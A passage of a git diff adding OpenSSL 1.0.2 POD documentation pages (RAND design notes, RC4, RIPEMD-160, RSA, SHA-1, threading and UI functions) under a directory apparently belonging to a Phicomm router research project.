+extractable from the RNG state.  I believe this should be a
+requirement because one possible source of 'secret' semi random
+data would be a private key or a password.  This data must
+not be disclosed by either subsequent random numbers or a
+'core' dump left by a program crash.
+
+=item 6
+
+Given the same initial 'state', 2 systems should deviate in their RNG state
+(and hence the random numbers generated) over time if at all possible.
+
+=item 7
+
+Given the random number output stream, it should not be possible to determine
+the RNG state or the next random number.
+
+=back
+
+The algorithm is as follows.
+
+There is global state made up of a 1023 byte buffer (the 'state'), a
+working hash value ('md'), and a counter ('count').
+
+Whenever seed data is added, it is inserted into the 'state' as
+follows.
+
+The input is chopped up into units of 20 bytes (or less for
+the last block).  Each of these blocks is run through the hash
+function as follows:  The data passed to the hash function
+is the current 'md', the same number of bytes from the 'state'
+(the location determined by in incremented looping index) as
+the current 'block', the new key data 'block', and 'count'
+(which is incremented after each use).
+The result of this is kept in 'md' and also xored into the
+'state' at the same locations that were used as input into the
+hash function. I
+believe this system addresses points 1 (hash function; currently
+SHA-1), 3 (the 'state'), 4 (via the 'md'), 5 (by the use of a hash
+function and xor).
+
+When bytes are extracted from the RNG, the following process is used.
+For each group of 10 bytes (or less), we do the following:
+
+Input into the hash function the local 'md' (which is initialized from
+the global 'md' before any bytes are generated), the bytes that are to
+be overwritten by the random bytes, and bytes from the 'state'
+(incrementing looping index). From this digest output (which is kept
+in 'md'), the top (up to) 10 bytes are returned to the caller and the
+bottom 10 bytes are xored into the 'state'.
+
+Finally, after we have finished 'num' random bytes for the caller,
+'count' (which is incremented) and the local and global 'md' are fed
+into the hash function and the results are kept in the global 'md'.
+
+I believe the above addressed points 1 (use of SHA-1), 6 (by hashing
+into the 'state' the 'old' data from the caller that is about to be
+overwritten) and 7 (by not using the 10 bytes given to the caller to
+update the 'state', but they are used to update 'md').
+
+So of the points raised, only 2 is not addressed (but see
+L<RAND_add(3)|RAND_add(3)>).
+
+=head1 SEE ALSO
+
+L<BN_rand(3)|BN_rand(3)>, L<RAND_add(3)|RAND_add(3)>,
+L<RAND_load_file(3)|RAND_load_file(3)>, L<RAND_egd(3)|RAND_egd(3)>,
+L<RAND_bytes(3)|RAND_bytes(3)>,
+L<RAND_set_rand_method(3)|RAND_set_rand_method(3)>,
+L<RAND_cleanup(3)|RAND_cleanup(3)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rc4.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rc4.pod
new file mode 100644
index 0000000..b6d3a43
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rc4.pod
@@ -0,0 +1,62 @@
+=pod
+
+=head1 NAME
+
+RC4_set_key, RC4 - RC4 encryption
+
+=head1 SYNOPSIS
+
+ #include <openssl/rc4.h>
+
+ void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data);
+
+ void RC4(RC4_KEY *key, unsigned long len, const unsigned char *indata,
+          unsigned char *outdata);
+
+=head1 DESCRIPTION
+
+This library implements the Alleged RC4 cipher, which is described for
+example in I<Applied Cryptography>.  It is believed to be compatible
+with RC4[TM], a proprietary cipher of RSA Security Inc.
+
+RC4 is a stream cipher with variable key length.  Typically, 128 bit
+(16 byte) keys are used for strong encryption, but shorter insecure
+key sizes have been widely used due to export restrictions.
+
+RC4 consists of a key setup phase and the actual encryption or
+decryption phase.
+
+RC4_set_key() sets up the B<RC4_KEY> B<key> using the B<len> bytes long
+key at B<data>.
+
+RC4() encrypts or decrypts the B<len> bytes of data at B<indata> using
+B<key> and places the result at B<outdata>.  Repeated RC4() calls with
+the same B<key> yield a continuous key stream.
+
+Since RC4 is a stream cipher (the input is XORed with a pseudo-random
+key stream to produce the output), decryption uses the same function
+calls as encryption.
+
+Applications should use the higher level functions
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>
+etc. instead of calling the RC4 functions directly.
+
+=head1 RETURN VALUES
+
+RC4_set_key() and RC4() do not return values.
+
+=head1 NOTE
+
+Certain conditions have to be observed to securely use stream ciphers.
+It is not permissible to perform multiple encryptions using the same
+key stream.
+
+=head1 SEE ALSO
+
+L<blowfish(3)|blowfish(3)>, L<des(3)|des(3)>, L<rc2(3)|rc2(3)>
+
+=head1 HISTORY
+
+RC4_set_key() and RC4() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ripemd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ripemd.pod
new file mode 100644
index 0000000..264bb99
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ripemd.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+RIPEMD160, RIPEMD160_Init, RIPEMD160_Update, RIPEMD160_Final -
+RIPEMD-160 hash function
+
+=head1 SYNOPSIS
+
+ #include <openssl/ripemd.h>
+
+ unsigned char *RIPEMD160(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int RIPEMD160_Init(RIPEMD160_CTX *c);
+ int RIPEMD160_Update(RIPEMD_CTX *c, const void *data,
+                  unsigned long len);
+ int RIPEMD160_Final(unsigned char *md, RIPEMD160_CTX *c);
+
+=head1 DESCRIPTION
+
+RIPEMD-160 is a cryptographic hash function with a
+160 bit output.
+
+RIPEMD160() computes the RIPEMD-160 message digest of the B<n>
+bytes at B<d> and places it in B<md> (which must have space for
+RIPEMD160_DIGEST_LENGTH == 20 bytes of output). If B<md> is NULL, the digest
+is placed in a static array.
+
+The following functions may be used if the message is not completely
+stored in memory:
+
+RIPEMD160_Init() initializes a B<RIPEMD160_CTX> structure.
+
+RIPEMD160_Update() can be called repeatedly with chunks of the message to
+be hashed (B<len> bytes at B<data>).
+
+RIPEMD160_Final() places the message digest in B<md>, which must have
+space for RIPEMD160_DIGEST_LENGTH == 20 bytes of output, and erases
+the B<RIPEMD160_CTX>.
+
+Applications should use the higher level functions
+L<EVP_DigestInit(3)|EVP_DigestInit(3)> etc. instead of calling the
+hash functions directly.
+
+=head1 RETURN VALUES
+
+RIPEMD160() returns a pointer to the hash value. 
+
+RIPEMD160_Init(), RIPEMD160_Update() and RIPEMD160_Final() return 1 for
+success, 0 otherwise.
+
+=head1 CONFORMING TO
+
+ISO/IEC 10118-3 (draft) (??)
+
+=head1 SEE ALSO
+
+L<sha(3)|sha(3)>, L<hmac(3)|hmac(3)>, L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+
+=head1 HISTORY
+
+RIPEMD160(), RIPEMD160_Init(), RIPEMD160_Update() and
+RIPEMD160_Final() are available since SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rsa.pod
new file mode 100644
index 0000000..45ac53f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rsa.pod
@@ -0,0 +1,123 @@
+=pod
+
+=head1 NAME
+
+rsa - RSA public key cryptosystem
+
+=head1 SYNOPSIS
+
+ #include <openssl/rsa.h>
+ #include <openssl/engine.h>
+
+ RSA * RSA_new(void);
+ void RSA_free(RSA *rsa);
+
+ int RSA_public_encrypt(int flen, unsigned char *from,
+    unsigned char *to, RSA *rsa, int padding);
+ int RSA_private_decrypt(int flen, unsigned char *from,
+    unsigned char *to, RSA *rsa, int padding);
+ int RSA_private_encrypt(int flen, unsigned char *from,
+    unsigned char *to, RSA *rsa,int padding);
+ int RSA_public_decrypt(int flen, unsigned char *from, 
+    unsigned char *to, RSA *rsa,int padding);
+
+ int RSA_sign(int type, unsigned char *m, unsigned int m_len,
+    unsigned char *sigret, unsigned int *siglen, RSA *rsa);
+ int RSA_verify(int type, unsigned char *m, unsigned int m_len,
+    unsigned char *sigbuf, unsigned int siglen, RSA *rsa);
+
+ int RSA_size(const RSA *rsa);
+
+ RSA *RSA_generate_key(int num, unsigned long e,
+    void (*callback)(int,int,void *), void *cb_arg);
+
+ int RSA_check_key(RSA *rsa);
+
+ int RSA_blinding_on(RSA *rsa, BN_CTX *ctx);
+ void RSA_blinding_off(RSA *rsa);
+
+ void RSA_set_default_method(const RSA_METHOD *meth);
+ const RSA_METHOD *RSA_get_default_method(void);
+ int RSA_set_method(RSA *rsa, const RSA_METHOD *meth);
+ const RSA_METHOD *RSA_get_method(const RSA *rsa);
+ RSA_METHOD *RSA_PKCS1_SSLeay(void);
+ RSA_METHOD *RSA_null_method(void);
+ int RSA_flags(const RSA *rsa);
+ RSA *RSA_new_method(ENGINE *engine);
+
+ int RSA_print(BIO *bp, RSA *x, int offset);
+ int RSA_print_fp(FILE *fp, RSA *x, int offset);
+
+ int RSA_get_ex_new_index(long argl, char *argp, int (*new_func)(),
+    int (*dup_func)(), void (*free_func)());
+ int RSA_set_ex_data(RSA *r,int idx,char *arg);
+ char *RSA_get_ex_data(RSA *r, int idx);
+
+ int RSA_sign_ASN1_OCTET_STRING(int dummy, unsigned char *m,
+    unsigned int m_len, unsigned char *sigret, unsigned int *siglen,
+    RSA *rsa);
+ int RSA_verify_ASN1_OCTET_STRING(int dummy, unsigned char *m,
+    unsigned int m_len, unsigned char *sigbuf, unsigned int siglen,
+    RSA *rsa);
+
+=head1 DESCRIPTION
+
+These functions implement RSA public key encryption and signatures
+as defined in PKCS #1 v2.0 [RFC 2437].
+
+The B<RSA> structure consists of several BIGNUM components. It can
+contain public as well as private RSA keys:
+
+ struct
+        {
+        BIGNUM *n;		// public modulus
+        BIGNUM *e;		// public exponent
+        BIGNUM *d;		// private exponent
+        BIGNUM *p;		// secret prime factor
+        BIGNUM *q;		// secret prime factor
+        BIGNUM *dmp1;		// d mod (p-1)
+        BIGNUM *dmq1;		// d mod (q-1)
+        BIGNUM *iqmp;		// q^-1 mod p
+	// ...
+        };
+ RSA
+
+In public keys, the private exponent and the related secret values are
+B<NULL>.
+
+B<p>, B<q>, B<dmp1>, B<dmq1> and B<iqmp> may be B<NULL> in private
+keys, but the RSA operations are much faster when these values are
+available.
+
+Note that RSA keys may use non-standard B<RSA_METHOD> implementations,
+either directly or by the use of B<ENGINE> modules. In some cases (eg. an
+ENGINE providing support for hardware-embedded keys), these BIGNUM values
+will not be used by the implementation or may be used for alternative data
+storage. For this reason, applications should generally avoid using RSA
+structure elements directly and instead use API functions to query or
+modify keys.
+
+=head1 CONFORMING TO
+
+SSL, PKCS #1 v2.0
+
+=head1 PATENTS
+
+RSA was covered by a US patent which expired in September 2000.
+
+=head1 SEE ALSO
+
+L<rsa(1)|rsa(1)>, L<bn(3)|bn(3)>, L<dsa(3)|dsa(3)>, L<dh(3)|dh(3)>,
+L<rand(3)|rand(3)>, L<engine(3)|engine(3)>, L<RSA_new(3)|RSA_new(3)>,
+L<RSA_public_encrypt(3)|RSA_public_encrypt(3)>,
+L<RSA_sign(3)|RSA_sign(3)>, L<RSA_size(3)|RSA_size(3)>,
+L<RSA_generate_key(3)|RSA_generate_key(3)>,
+L<RSA_check_key(3)|RSA_check_key(3)>,
+L<RSA_blinding_on(3)|RSA_blinding_on(3)>,
+L<RSA_set_method(3)|RSA_set_method(3)>, L<RSA_print(3)|RSA_print(3)>,
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>,
+L<RSA_private_encrypt(3)|RSA_private_encrypt(3)>,
+L<RSA_sign_ASN1_OCTET_STRING(3)|RSA_sign_ASN1_OCTET_STRING(3)>,
+L<RSA_padding_add_PKCS1_type_1(3)|RSA_padding_add_PKCS1_type_1(3)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/sha.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/sha.pod
new file mode 100644
index 0000000..94ab7bc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/sha.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+SHA1, SHA1_Init, SHA1_Update, SHA1_Final - Secure Hash Algorithm
+
+=head1 SYNOPSIS
+
+ #include <openssl/sha.h>
+
+ unsigned char *SHA1(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int SHA1_Init(SHA_CTX *c);
+ int SHA1_Update(SHA_CTX *c, const void *data,
+                  unsigned long len);
+ int SHA1_Final(unsigned char *md, SHA_CTX *c);
+
+=head1 DESCRIPTION
+
+SHA-1 (Secure Hash Algorithm) is a cryptographic hash function with a
+160 bit output.
+
+SHA1() computes the SHA-1 message digest of the B<n>
+bytes at B<d> and places it in B<md> (which must have space for
+SHA_DIGEST_LENGTH == 20 bytes of output). If B<md> is NULL, the digest
+is placed in a static array.
+
+The following functions may be used if the message is not completely
+stored in memory:
+
+SHA1_Init() initializes a B<SHA_CTX> structure.
+
+SHA1_Update() can be called repeatedly with chunks of the message to
+be hashed (B<len> bytes at B<data>).
+
+SHA1_Final() places the message digest in B<md>, which must have space
+for SHA_DIGEST_LENGTH == 20 bytes of output, and erases the B<SHA_CTX>.
+
+Applications should use the higher level functions
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+etc. instead of calling the hash functions directly.
+
+The predecessor of SHA-1, SHA, is also implemented, but it should be
+used only when backward compatibility is required.
+
+=head1 RETURN VALUES
+
+SHA1() returns a pointer to the hash value. 
+
+SHA1_Init(), SHA1_Update() and SHA1_Final() return 1 for success, 0 otherwise.
+
+=head1 CONFORMING TO
+
+SHA: US Federal Information Processing Standard FIPS PUB 180 (Secure Hash
+Standard),
+SHA-1: US Federal Information Processing Standard FIPS PUB 180-1 (Secure Hash
+Standard),
+ANSI X9.30
+
+=head1 SEE ALSO
+
+L<ripemd(3)|ripemd(3)>, L<hmac(3)|hmac(3)>, L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+
+=head1 HISTORY
+
+SHA1(), SHA1_Init(), SHA1_Update() and SHA1_Final() are available in all
+versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/threads.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/threads.pod
new file mode 100644
index 0000000..dc0e939
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/threads.pod
@@ -0,0 +1,210 @@
+=pod
+
+=head1 NAME
+
+CRYPTO_THREADID_set_callback, CRYPTO_THREADID_get_callback,
+CRYPTO_THREADID_current, CRYPTO_THREADID_cmp, CRYPTO_THREADID_cpy,
+CRYPTO_THREADID_hash, CRYPTO_set_locking_callback, CRYPTO_num_locks,
+CRYPTO_set_dynlock_create_callback, CRYPTO_set_dynlock_lock_callback,
+CRYPTO_set_dynlock_destroy_callback, CRYPTO_get_new_dynlockid,
+CRYPTO_destroy_dynlockid, CRYPTO_lock - OpenSSL thread support
+
+=head1 SYNOPSIS
+
+ #include <openssl/crypto.h>
+
+ /* Don't use this structure directly. */
+ typedef struct crypto_threadid_st
+         {
+         void *ptr;
+         unsigned long val;
+         } CRYPTO_THREADID;
+ /* Only use CRYPTO_THREADID_set_[numeric|pointer]() within callbacks */
+ void CRYPTO_THREADID_set_numeric(CRYPTO_THREADID *id, unsigned long val);
+ void CRYPTO_THREADID_set_pointer(CRYPTO_THREADID *id, void *ptr);
+ int CRYPTO_THREADID_set_callback(void (*threadid_func)(CRYPTO_THREADID *));
+ void (*CRYPTO_THREADID_get_callback(void))(CRYPTO_THREADID *);
+ void CRYPTO_THREADID_current(CRYPTO_THREADID *id);
+ int CRYPTO_THREADID_cmp(const CRYPTO_THREADID *a,
+                         const CRYPTO_THREADID *b);
+ void CRYPTO_THREADID_cpy(CRYPTO_THREADID *dest,
+                          const CRYPTO_THREADID *src);
+ unsigned long CRYPTO_THREADID_hash(const CRYPTO_THREADID *id);
+
+ int CRYPTO_num_locks(void);
+
+ /* struct CRYPTO_dynlock_value needs to be defined by the user */
+ struct CRYPTO_dynlock_value;
+
+ void CRYPTO_set_dynlock_create_callback(struct CRYPTO_dynlock_value *
+	(*dyn_create_function)(char *file, int line));
+ void CRYPTO_set_dynlock_lock_callback(void (*dyn_lock_function)
+	(int mode, struct CRYPTO_dynlock_value *l,
+	const char *file, int line));
+ void CRYPTO_set_dynlock_destroy_callback(void (*dyn_destroy_function)
+	(struct CRYPTO_dynlock_value *l, const char *file, int line));
+
+ int CRYPTO_get_new_dynlockid(void);
+
+ void CRYPTO_destroy_dynlockid(int i);
+
+ void CRYPTO_lock(int mode, int n, const char *file, int line);
+
+ #define CRYPTO_w_lock(type)	\
+	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
+ #define CRYPTO_w_unlock(type)	\
+	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
+ #define CRYPTO_r_lock(type)	\
+	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_READ,type,__FILE__,__LINE__)
+ #define CRYPTO_r_unlock(type)	\
+	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_READ,type,__FILE__,__LINE__)
+ #define CRYPTO_add(addr,amount,type)	\
+	CRYPTO_add_lock(addr,amount,type,__FILE__,__LINE__)
+
+=head1 DESCRIPTION
+
+OpenSSL can safely be used in multi-threaded applications provided
+that at least two callback functions are set, locking_function and
+threadid_func.
+
+locking_function(int mode, int n, const char *file, int line) is
+needed to perform locking on shared data structures. 
+(Note that OpenSSL uses a number of global data structures that
+will be implicitly shared whenever multiple threads use OpenSSL.)
+Multi-threaded applications will crash at random if it is not set.
+
+locking_function() must be able to handle up to CRYPTO_num_locks()
+different mutex locks. It sets the B<n>-th lock if B<mode> &
+B<CRYPTO_LOCK>, and releases it otherwise.
+
+B<file> and B<line> are the file number of the function setting the
+lock. They can be useful for debugging.
+
+threadid_func(CRYPTO_THREADID *id) is needed to record the currently-executing
+thread's identifier into B<id>. The implementation of this callback should not
+fill in B<id> directly, but should use CRYPTO_THREADID_set_numeric() if thread
+IDs are numeric, or CRYPTO_THREADID_set_pointer() if they are pointer-based.
+If the application does not register such a callback using
+CRYPTO_THREADID_set_callback(), then a default implementation is used - on
+Windows and BeOS this uses the system's default thread identifying APIs, and on
+all other platforms it uses the address of B<errno>. The latter is satisfactory
+for thread-safety if and only if the platform has a thread-local error number
+facility.
+
+Once threadid_func() is registered, or if the built-in default implementation is
+to be used;
+
+=over 4
+
+=item *
+CRYPTO_THREADID_current() records the currently-executing thread ID into the
+given B<id> object.
+
+=item *
+CRYPTO_THREADID_cmp() compares two thread IDs (returning zero for equality, ie.
+the same semantics as memcmp()).
+
+=item *
+CRYPTO_THREADID_cpy() duplicates a thread ID value,
+
+=item *
+CRYPTO_THREADID_hash() returns a numeric value usable as a hash-table key. This
+is usually the exact numeric or pointer-based thread ID used internally, however
+this also handles the unusual case where pointers are larger than 'long'
+variables and the platform's thread IDs are pointer-based - in this case, mixing
+is done to attempt to produce a unique numeric value even though it is not as
+wide as the platform's true thread IDs.
+
+=back
+
+Additionally, OpenSSL supports dynamic locks, and sometimes, some parts
+of OpenSSL need it for better performance.  To enable this, the following
+is required:
+
+=over 4
+
+=item *
+Three additional callback function, dyn_create_function, dyn_lock_function
+and dyn_destroy_function.
+
+=item *
+A structure defined with the data that each lock needs to handle.
+
+=back
+
+struct CRYPTO_dynlock_value has to be defined to contain whatever structure
+is needed to handle locks.
+
+dyn_create_function(const char *file, int line) is needed to create a
+lock.  Multi-threaded applications might crash at random if it is not set.
+
+dyn_lock_function(int mode, CRYPTO_dynlock *l, const char *file, int line)
+is needed to perform locking off dynamic lock numbered n. Multi-threaded
+applications might crash at random if it is not set.
+
+dyn_destroy_function(CRYPTO_dynlock *l, const char *file, int line) is
+needed to destroy the lock l. Multi-threaded applications might crash at
+random if it is not set.
+
+CRYPTO_get_new_dynlockid() is used to create locks.  It will call
+dyn_create_function for the actual creation.
+
+CRYPTO_destroy_dynlockid() is used to destroy locks.  It will call
+dyn_destroy_function for the actual destruction.
+
+CRYPTO_lock() is used to lock and unlock the locks.  mode is a bitfield
+describing what should be done with the lock.  n is the number of the
+lock as returned from CRYPTO_get_new_dynlockid().  mode can be combined
+from the following values.  These values are pairwise exclusive, with
+undefined behaviour if misused (for example, CRYPTO_READ and CRYPTO_WRITE
+should not be used together):
+
+	CRYPTO_LOCK	0x01
+	CRYPTO_UNLOCK	0x02
+	CRYPTO_READ	0x04
+	CRYPTO_WRITE	0x08
+
+=head1 RETURN VALUES
+
+CRYPTO_num_locks() returns the required number of locks.
+
+CRYPTO_get_new_dynlockid() returns the index to the newly created lock.
+
+The other functions return no values.
+
+=head1 NOTES
+
+You can find out if OpenSSL was configured with thread support:
+
+ #define OPENSSL_THREAD_DEFINES
+ #include <openssl/opensslconf.h>
+ #if defined(OPENSSL_THREADS)
+   // thread support enabled
+ #else
+   // no thread support
+ #endif
+
+Also, dynamic locks are currently not used internally by OpenSSL, but
+may do so in the future.
+
+=head1 EXAMPLES
+
+B<crypto/threads/mttest.c> shows examples of the callback functions on
+Solaris, Irix and Win32.
+
+=head1 HISTORY
+
+CRYPTO_set_locking_callback() is
+available in all versions of SSLeay and OpenSSL.
+CRYPTO_num_locks() was added in OpenSSL 0.9.4.
+All functions dealing with dynamic locks were added in OpenSSL 0.9.5b-dev.
+B<CRYPTO_THREADID> and associated functions were introduced in OpenSSL 1.0.0
+to replace (actually, deprecate) the previous CRYPTO_set_id_callback(),
+CRYPTO_get_id_callback(), and CRYPTO_thread_id() functions which assumed
+thread IDs to always be represented by 'unsigned long'.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui.pod
new file mode 100644
index 0000000..04f8e9c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui.pod
@@ -0,0 +1,194 @@
+=pod
+
+=head1 NAME
+
+UI_new, UI_new_method, UI_free, UI_add_input_string, UI_dup_input_string,
+UI_add_verify_string, UI_dup_verify_string, UI_add_input_boolean,
+UI_dup_input_boolean, UI_add_info_string, UI_dup_info_string,
+UI_add_error_string, UI_dup_error_string, UI_construct_prompt,
+UI_add_user_data, UI_get0_user_data, UI_get0_result, UI_process,
+UI_ctrl, UI_set_default_method, UI_get_default_method, UI_get_method,
+UI_set_method, UI_OpenSSL, ERR_load_UI_strings - New User Interface
+
+=head1 SYNOPSIS
+
+ #include <openssl/ui.h>
+
+ typedef struct ui_st UI;
+ typedef struct ui_method_st UI_METHOD;
+
+ UI *UI_new(void);
+ UI *UI_new_method(const UI_METHOD *method);
+ void UI_free(UI *ui);
+
+ int UI_add_input_string(UI *ui, const char *prompt, int flags,
+	char *result_buf, int minsize, int maxsize);
+ int UI_dup_input_string(UI *ui, const char *prompt, int flags,
+	char *result_buf, int minsize, int maxsize);
+ int UI_add_verify_string(UI *ui, const char *prompt, int flags,
+	char *result_buf, int minsize, int maxsize, const char *test_buf);
+ int UI_dup_verify_string(UI *ui, const char *prompt, int flags,
+	char *result_buf, int minsize, int maxsize, const char *test_buf);
+ int UI_add_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+	const char *ok_chars, const char *cancel_chars,
+	int flags, char *result_buf);
+ int UI_dup_input_boolean(UI *ui, const char *prompt, const char *action_desc,
+	const char *ok_chars, const char *cancel_chars,
+	int flags, char *result_buf);
+ int UI_add_info_string(UI *ui, const char *text);
+ int UI_dup_info_string(UI *ui, const char *text);
+ int UI_add_error_string(UI *ui, const char *text);
+ int UI_dup_error_string(UI *ui, const char *text);
+
+ /* These are the possible flags.  They can be or'ed together. */
+ #define UI_INPUT_FLAG_ECHO		0x01
+ #define UI_INPUT_FLAG_DEFAULT_PWD	0x02
+
+ char *UI_construct_prompt(UI *ui_method,
+	const char *object_desc, const char *object_name);
+
+ void *UI_add_user_data(UI *ui, void *user_data);
+ void *UI_get0_user_data(UI *ui);
+
+ const char *UI_get0_result(UI *ui, int i);
+
+ int UI_process(UI *ui);
+
+ int UI_ctrl(UI *ui, int cmd, long i, void *p, void (*f)());
+ #define UI_CTRL_PRINT_ERRORS		1
+ #define UI_CTRL_IS_REDOABLE		2
+
+ void UI_set_default_method(const UI_METHOD *meth);
+ const UI_METHOD *UI_get_default_method(void);
+ const UI_METHOD *UI_get_method(UI *ui);
+ const UI_METHOD *UI_set_method(UI *ui, const UI_METHOD *meth);
+
+ UI_METHOD *UI_OpenSSL(void);
+
+=head1 DESCRIPTION
+
+UI stands for User Interface, and is general purpose set of routines to
+prompt the user for text-based information.  Through user-written methods
+(see L<ui_create(3)|ui_create(3)>), prompting can be done in any way
+imaginable, be it plain text prompting, through dialog boxes or from a
+cell phone.
+
+All the functions work through a context of the type UI.  This context
+contains all the information needed to prompt correctly as well as a
+reference to a UI_METHOD, which is an ordered vector of functions that
+carry out the actual prompting.
+
+The first thing to do is to create a UI with UI_new() or UI_new_method(),
+then add information to it with the UI_add or UI_dup functions.  Also,
+user-defined random data can be passed down to the underlying method
+through calls to UI_add_user_data.  The default UI method doesn't care
+about these data, but other methods might.  Finally, use UI_process()
+to actually perform the prompting and UI_get0_result() to find the result
+to the prompt.
+
+A UI can contain more than one prompt, which are performed in the given
+sequence.  Each prompt gets an index number which is returned by the
+UI_add and UI_dup functions, and has to be used to get the corresponding
+result with UI_get0_result().
+
+The functions are as follows:
+
+UI_new() creates a new UI using the default UI method.  When done with
+this UI, it should be freed using UI_free().
+
+UI_new_method() creates a new UI using the given UI method.  When done with
+this UI, it should be freed using UI_free().
+
+UI_OpenSSL() returns the built-in UI method (note: not the default one,
+since the default can be changed.  See further on).  This method is the
+most machine/OS dependent part of OpenSSL and normally generates the
+most problems when porting.
+
+UI_free() removes a UI from memory, along with all other pieces of memory
+that's connected to it, like duplicated input strings, results and others.
+
+UI_add_input_string() and UI_add_verify_string() add a prompt to the UI,
+as well as flags and a result buffer and the desired minimum and maximum
+sizes of the result.  The given information is used to prompt for
+information, for example a password, and to verify a password (i.e. having
+the user enter it twice and check that the same string was entered twice).
+UI_add_verify_string() takes and extra argument that should be a pointer
+to the result buffer of the input string that it's supposed to verify, or
+verification will fail.
+
+UI_add_input_boolean() adds a prompt to the UI that's supposed to be answered
+in a boolean way, with a single character for yes and a different character
+for no.  A set of characters that can be used to cancel the prompt is given
+as well.  The prompt itself is divided in two, one part being the
+descriptive text (given through the I<prompt> argument) and one describing
+the possible answers (given through the I<action_desc> argument).
+
+UI_add_info_string() and UI_add_error_string() add strings that are shown at
+the same time as the prompt for extra information or to show an error string.
+The difference between the two is only conceptual.  With the builtin method,
+there's no technical difference between them.  Other methods may make a
+difference between them, however.
+
+The flags currently supported are UI_INPUT_FLAG_ECHO, which is relevant for
+UI_add_input_string() and will have the users response be echoed (when
+prompting for a password, this flag should obviously not be used, and
+UI_INPUT_FLAG_DEFAULT_PWD, which means that a default password of some
+sort will be used (completely depending on the application and the UI
+method).
+
+UI_dup_input_string(), UI_dup_verify_string(), UI_dup_input_boolean(),
+UI_dup_info_string() and UI_dup_error_string() are basically the same
+as their UI_add counterparts, except that they make their own copies
+of all strings.
+
+UI_construct_prompt() is a helper function that can be used to create
+a prompt from two pieces of information: an description and a name.
+The default constructor (if there is none provided by the method used)
+creates a string "Enter I<description> for I<name>:".  With the
+description "pass phrase" and the file name "foo.key", that becomes
+"Enter pass phrase for foo.key:".  Other methods may create whatever
+string and may include encodings that will be processed by the other
+method functions.
+
+UI_add_user_data() adds a piece of memory for the method to use at any
+time.  The builtin UI method doesn't care about this info.  Note that several
+calls to this function doesn't add data, it replaces the previous blob
+with the one given as argument.
+
+UI_get0_user_data() retrieves the data that has last been given to the
+UI with UI_add_user_data().
+
+UI_get0_result() returns a pointer to the result buffer associated with
+the information indexed by I<i>.
+
+UI_process() goes through the information given so far, does all the printing
+and prompting and returns.
+
+UI_ctrl() adds extra control for the application author.  For now, it
+understands two commands: UI_CTRL_PRINT_ERRORS, which makes UI_process()
+print the OpenSSL error stack as part of processing the UI, and
+UI_CTRL_IS_REDOABLE, which returns a flag saying if the used UI can
+be used again or not.
+
+UI_set_default_method() changes the default UI method to the one given.
+
+UI_get_default_method() returns a pointer to the current default UI method.
+
+UI_get_method() returns the UI method associated with a given UI.
+
+UI_set_method() changes the UI method associated with a given UI.
+
+=head1 SEE ALSO
+
+L<ui_create(3)|ui_create(3)>, L<ui_compat(3)|ui_compat(3)>
+
+=head1 HISTORY
+
+The UI section was first introduced in OpenSSL 0.9.7.
+
+=head1 AUTHOR
+
+Richard Levitte (richard@levitte.org) for the OpenSSL project
+(http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui_compat.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui_compat.pod
new file mode 100644
index 0000000..adf2ae5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/ui_compat.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+des_read_password, des_read_2passwords, des_read_pw_string, des_read_pw -
+Compatibility user interface functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/des_old.h>
+
+ int des_read_password(DES_cblock *key,const char *prompt,int verify);
+ int des_read_2passwords(DES_cblock *key1,DES_cblock *key2,
